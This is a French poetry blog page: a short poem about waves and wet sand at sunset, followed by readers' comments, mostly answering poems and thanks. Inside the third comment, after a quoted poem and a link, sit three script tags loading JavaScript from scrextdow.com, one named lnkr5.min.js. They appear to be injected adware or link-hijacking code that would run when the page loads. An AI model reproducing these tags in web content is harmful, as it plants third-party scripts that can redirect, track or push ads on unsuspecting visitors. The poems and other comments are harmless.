• Sur le sable mouillé...

     

    Quand la vague se meurt sur les côtes océanes

    que le ciel du couchant se mire dans le bleu

    flottent un moment de paix, d'effleurements marins

    d'écritures magiques qui sillonnent nos pas ...

    Au plus près du silence

    seuls avec l'immensité

    où le regard se perd  sur l'envol de ce jour

    souffle un charme exquis 

    le fil de Joie !

     

    Merci à ABC qui m'a donné le " la "


  • Commentaires

    1
    Vendredi 13 Juillet à 12:16

    Mon "la" était de brume,

    le tien est solitaire

    l'immensité marine

    en bonheur poétique

    vague du partage !

    2
    Vendredi 13 Juillet à 14:37

    La plage rêve de nuages

    les nuages rêvent de plage

    et moi je rêve de plage nuage  smile

    3
    Vendredi 13 Juillet à 17:21

    Un poème avec des mots tout plein d'écume de mer et de rêveries

     

    "Sur le sable mouillé

    La mer a fredonné

    un poème secret

    Ponctué de galets

    Que le vent a tracé

    A l'encre des marées

    Il reste à déchiffrer..."

    https://marie-aupaysdesimagesetdesmots.blogspot.com/2016/12/brindille-poetiquesur-le-sable-mouille.html

     

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>
    4
    Vendredi 13 Juillet à 18:01

    Bonjour, j'aime bien ce côté poétique en regardant une photo. Moi je ressens souvent un moment de pleine zénitude que je ne peux exprimer par des mots car je m'évade complètement.

    Bravo

    Au plaisir de te lire

    5
    Samedi 14 Juillet à 09:09
    marine D

     

     

    Je perçois le cri aigu

    De la mouette

    Les vagues unes à unes

    Ont frappé le rocher

    Un chant d'éternité

    Résonne et se répète

    Entre mer et rivage

    Le temps froissé s'envole

    C'est l'instant impalpable

    Qui jamais ne revient

    Il s'écoule de nos mains

    Unies en coupe illusoire

    J'ai pris un peu de sable

    Pour en garder la trace

    Volé le son du vent

    Comme une voile il claque

     

    Dans mes intermittences...


       © marine D

     


    Merci pour cette belle page Balaline, la mer me manque et la photo me fait penser aux longues plages des Landes que j'aime tellement !

     

    6
    Samedi 14 Juillet à 12:54

    Un fil à suivre absolument.

    Merci pour cette page, Balaline.

    Bisous et douce journée.

    7
    Samedi 14 Juillet à 16:04

    Bonjour Balaline, 

    J'aime la silhouette immobile, perdue dans son reflet, au milieu du temps. On aperçoit  dans le grisé de l'eau et des nuages, un bleu doux qui se confond avec l'écume des vagues vertes s'élançant sur la plage.

    Tes mots sont un régal et la photo est superbe. Merci.

    Très bon week-end. 

    8
    Samedi 14 Juillet à 16:48
    marine D

    Merci Balaline de m'avoir dit de quel endroit tu es,  je sentais bien que j'étais chez toi en pays connu ...
    Née dans les Landes, j'en garde le gout...

    Bonne soirée

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :